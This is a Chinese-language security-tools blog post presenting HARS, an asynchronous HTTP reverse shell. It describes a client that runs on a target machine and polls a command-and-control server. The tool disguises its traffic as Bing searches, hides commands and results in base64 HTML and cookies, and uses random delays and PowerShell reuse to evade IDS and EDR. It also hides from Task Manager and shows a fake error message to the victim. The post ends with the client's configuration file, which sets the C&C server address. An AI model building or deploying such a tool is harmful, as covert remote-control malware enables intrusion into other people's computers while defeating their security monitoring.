使用HTTP协议的异步反向Shell/反弹Shell

发表于 2020年03月11日
安全工具

HTTP异步反向Shell

有很多方法可以创建反向shell，以便能够通过防火墙远程控制计算机。确实，传出连接并不总是被过滤。

但是，安全软件和硬件（IPS，IDS，Proxy，AV，EDR等）功能越来越强大，可以检测到这些攻击。在大多数情况下，通过TCP或UDP隧道建立与反向Shell的连接。我认为最好的检测方法是使它看起来像合法流量。HTTP协议是标准用户最常使用的协议。而且，它几乎从未被过滤，以免阻止访问网站。

怎么运行的？

客户端应用程序在目标计算机上执行。
客户端启动与服务器的连接。
服务器接受连接。

然后：

客户端查询服务器，直到获得指示。
攻击者向服务器提供指令。
定义命令后，客户端将执行该命令并返回结果。

依此类推，直到攻击者决定结束会话为止。

特征

实现了以下功能：

伪造的HTTP流量显示为在bing.com上的搜索。
命令在HTML响应中以base64编码。
客户端将命令的结果编码为base64中的cookie。
[可选] SSL支持；默认情况下，它是伪造的bing.com证书。
每个客户端调用之间的随机延迟，以避免触发IDS。
服务器的每个响应都使用随机模板。
重新使用相同的Powershell流程，以避免触发EDR。
支持所有Cmd和Powershell命令。
[可选]客户端可以在启动时显示伪造的错误消息。
客户端从任务管理器中隐藏。
[可选]客户端可以管理员身份运行。

使用示例

有一些配置参数可以在HARS.sln中的Config.cs修改。

class Config
    {
        /* Behavior */
        // Display a fake error msg at startup
        public static bool DisplayErrorMsg = true;
        // Title of fake error msg
        public static string ErrorMsgTitle = "This application could not be started.";
        // Description of fake error msg
        public static string ErrorMsgDesc = "Unhandled exception has occured in your application. \r\r Object {0} is not valid.";
        // Min delay between the client calls
        public static int MinDelay = 2;
        // Max delay between the client calls
        public static int MaxDelay = 5;
        // Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
        public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";
        /* Listener */
        // Hostname/IP of C&C server
        public static string Server = "https://127.0.0.1";
        // Listening port of C&C server
        public static string Port = "443";
        // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
        public static bool AllowInsecureCertificate = true;
    }